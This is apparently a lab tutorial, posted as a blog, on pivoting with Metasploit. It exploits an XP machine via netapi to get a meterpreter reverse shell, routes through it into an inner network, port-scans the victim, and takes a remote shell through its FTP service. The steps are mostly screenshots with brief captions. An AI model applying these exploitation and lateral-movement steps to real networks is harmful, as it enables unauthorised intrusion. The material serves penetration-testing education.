METASPLOIT - PIVOTING
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhstFCdksCnUsFqq19zMtxVbWRVqDV6a827sDyvNInsZSn9WWkoTAWDRBFWRWfm-UPO-oLibsXVqjXQnZODy6Oe0AvKRmBS2CgA_io0YOhbGFAVnAtM2I6rP5RLaXGsl2q_DgeC74twQCjm/s1600/screenshot.30.jpg)
- First, let's exploit the pivot XP taking advantage of the netapi vulnerability:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifm0AxEQEhSdVhENv5gci1xMeeWYEw9m4nWh8tclScLYo9SItECT4mwotp2D-JHyqSzcurPDb-0NvP4B_B_scqAJM7OBF5i-SGD8F1ARBA5T_mVkSHEbViAk5h4qSGibi5OUc6AzGkPelL/s1600/screenshot.4.jpg)
- Setting the remote host to the XP's IP address:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7nb5Hg009S2vvQmhTuDe4rTWBnX3RXXTmYovBxW2RmxAv3oaIAfUUysuYDlrz1oTUG-zhkNTlMNO5u8AeYYHWSnxwqkMT2qIlmhz-U1A2paoM72ArUal4pHm80dz3USuHMFngpNkTKDH-/s1600/screenshot.5.jpg)
- Looking for a meterpreter session and a reverse_tcp shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7G7DC-PY47K_KmJ1J6rPYHAq7SSSuQ-luLQ38O1D_Md8k5RyeP0xE9liEa8CyWiYVJ2S9FGehhBlJCjRu8g1JAXwnwjXIe7tSeQCqJEtoN3hXaAphLHUH_djYYhidtPy8oCnrfZD4C_PX/s1600/screenshot.6.jpg)
- The local host is the attacker itself, due to the reverse shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ5k-sZUcOn4R8Wm1U45LqlNkLnGvljmynRCurLiH8nFvHP21YAG6TPQzbu8F5pLbVvd90uZ-nHbOgsM-JVLY6kTooWtkbcM0e6ThB6mYvjKsfmBUqkjN9b3iX2WYzMXH8eDsCrvuTzFYp/s1600/screenshot.7.jpg)
- Once launched the exploit, the attack is successful and a meterpreter session is achieved:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzss1XVmbSIIN_wMdSVWP3Yf_6ojU3N6IGx27WQS-iWy5FZJCoP_iAzCLn5egErwDJyIcA07sHs5o0PvvDdoIHv82Ot_6e4edxRZfmpMGUAQ7bLIvKlcTySRvY3jRr9aAEXry3IULV4VZp/s1600/screenshot.8.jpg)
- The pivot has got two interfaces, one with the outside network 192.168.1.0 and the other with inside network 10.0.0.0:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijhvbABFOWcuKvQQpUfIvtUMqcGFt5VTkEgU1nytmBPb2rsp-xtFici4v2_pS6FhlRFhgnJ33RYhSlnBNO8uyx8wrPGYLKuwwHVmIJ9YNe3nUn39yMZPuz_0tLUNJKZhlm9LlM4ggbgZrO/s1600/screenshot.11.jpg)
- Let's discover hosts inside the inside network 10.0.0.0/24. Because 10.0.0.1 corresponds to the pivot XP, the 10.0.0.2 must belong to the innermost machine, the vitcim:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCgCoXnK0i_X_8enjgXinB_NHmpfR4xfzEUtuVbcOwPfd7DrujZNa41ntx-DiVT4DUM3xNIqbgeiv3WRnP70jIF-QGQ2O8LXw_RXXJdY2Hh11dUhjb2QBY-e2fb_0_PQtVnHFRHP9GJVS3/s1600/screenshot.12.jpg)
- Backgrounding the meterpreter session 1:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5bWJ7kt7Kh1egGLbNK___BX5Y0cbPkVe48xAPX1N5JkMtaYKYrmSq2cQyaga93L7KJTlwFxHJfCPpax5UUUs4fSdxlUTAJOqhyZUVYBICJXUyqhIMPzIY_fObG47d8upho426v3QySzWk/s400/screenshot.9.jpg)
- So far, there is only one active meterpreter, number 1:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJg_RvYCdjJgvdtof8ehA5eP5KmmpXnojRypkIYhYwTM-g5DcdkTwkE8SMGNecmphfnStrK1dXbqio2rCVrtEAh0-aWS_r7J39PahuP4aMeowKnK7zhTAueNre6oOzvG5Elt85a58kE73E/s1600/screenshot.10.jpg)
- A route is added to the inside network, using the active meterpreter session 1:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5mGWO44OuIPFknsGHrMr0oEEtyW7lAJXEj93A7TxCHw5CLGYmZyWrOF3bB4WRPbWHEIjFUc4tWX8Yjkr-oCYIf0RU0t5ORxCD6kZ0IBuQOdX23ZPTYob89Xn65EPYEsUP1EzECGHKOn4i/s1600/screenshot.14.jpg)
- Printing the route:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnVIGmUoxpkXdWlPsoJzmEHtPfAjWGt73X1ZLHidwdo4Dfnhg1cVwzv-Cj_4GmEj1tQbVe9cyhO7jaEjrfLMh-ymY2zY4ohwKFvpiofQH8werfj20awamWbHXo8V83r-Ljmfp-10jFQB57/s1600/screenshot.15.jpg)
- Backing from the netapi exploit:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ2HarMMzVqMoQjmfnNZkClu8vCTHEZx7dcObGcUzIoKYluox_LJMJ-WL1xgtLGHkY54HX0AwfEjF05AWR0QBinTxpl_RAb5G3LpOyTb1XDZyG9eOk8DSuGStLsMvrwhEoLyth78WthQo7/s1600/screenshot.16.jpg)
- Scanning open ports (just from 1 to 500) at the victim 10.0.0.2:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglRpEunqO-jR9hgQOb6Joe9ifk1bo4l02D_X_gGzYVxZgMXp95ggjhzDPbWuqFW_Ju3VeK7REc6zAiFwEkDBhqRAy4WBwMHxwUT46YBu2GruHXlIAyTRmU1h8-wvDC2-UaRuSBw7xK-DsB/s1600/screenshot.17.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJvm96Yke83GpXPYhYpl1bHibHO1fJJ2l_n-wzNPxaC-v2i65F8dtnc3lQqtr-CFyWS1YwAl4OPd0OzB3eWlIZlbKfiakRbKsnAI5SS7r5MuFYZu9K3K4_thUOssL-cWrdOFfRJIBdGjM1/s1600/screenshot.18.jpg)
- Several interesting ports are open, for instance TCP 21, usually dedicated to FTP service:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPdi5O9VPcFZf4iJq3nNRnAJx3KJ630XSB_JnEiqWU9vdteYEp8Ekr2HVvYuIcCiwz-es7VjVq1AbDRSogPxtXrmP5yxrVNbZmeLNv3TQ4LPGaRy4XSCP9h_BURcYuvpVJHoG8eCroncu7/s1600/screenshot.19.jpg)
- Backing from the auxiliary script:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYp7dptxGcF96xsEr5Z8tfDY68CGNLf6yeWz2BDaMhbAyGoFell3FJPI0jj5XWNNa5R5qnTOHy3JCn-osRPMEDLHWM_BYfA2UTckSz4_Zlcy_sEBTNnXI5-hB6wcUS19njaUT3lkl9FyKd/s400/screenshot.20.jpg)
- Now, let's try attacking the FTP service on the victim:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixL25LT-3S0lf96Nkb9Ajoc5TyAb2gDjdSg9pksLabbaVioPTGaiZJMv2Y8Ivy9PTfX0jFBuvGPgIupZxUfuQtguwZZYemgusCmZG6S3-znZLbzmA-Vd4v_XXMEB3nJjqq0p4UFmrGSxQ3/s1600/screenshot.21.jpg)
- Setting the victim's IP as the remote host:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkXPvYWQE2D346cd2TjV0PGhDr-TdW14X7HjiV3ywo4FxcTUU-zVWaV46pvUp9ksHcysyjo9xtT8zGX78K5QO7UrmKGcurnpZ7AvtWyDo7giU0IVi2DNU78ecMvWZzUixv5SfQpPm_SDOH/s1600/screenshot.22.jpg)
- Let's use the payload cmd/unix/interact to get a remote shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizB1hCYHC1ub7y1GYUBFtnYFZ0-xlC14Nzur9aPB-JtUrjaIKMTG7Dw_hFw2HGBGYyGfFJ58i9H5i5Ms5-rdUD-1Y2Z-Tc57mcg9vEM93ECVYHKpPVJvgMneiliVfGhPSGm-TDt275TRit/s1600/screenshot.23.jpg)
- Required options:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVwZ-9c6aFaJgO-BoSsgQvuaXUHAU7quOxowyZl6O-AbNnGEsLgVPpB8AGl6G_QneT7BnLTbfyGEBOgIiEGTjGSuG4LqRVpQK_KZVyY5kyjZpOvqWNOwZAr6PhvYkrjJbdYnwuLtNnYVmk/s1600/screenshot.24.jpg)
- Once the exploit is run the attack is successful because the remote shell is finally achieved, back from the victim's machine:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikrmSmj4Fhv5I2JhtzX-J2A8uMTneOmRpprbZPa1iLGdf4aSwx38LhJERImXDRAwFj3Eb_uxrFbvOqCcyG2QcsaMoow6-gZfhqtmPb-kJOpJsNuTfEoWWS6qvekma6OGjoH0XsPLfDlDnT/s1600/screenshot.25.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkhKji9k4kRdwXGXrYjXN6Q8mEV5nY-xT8lTHZ-JQbdvMiCBFiX_W7zQ92SeA6P_euflDOZ23P2N1R44TPHRDSZ6_Tas-RDCv4B8QiE4dh5fm4Ei5s-DzN30bquIXYPSd6mTc-NL05UhJQ/s1600/screenshot.27.jpg)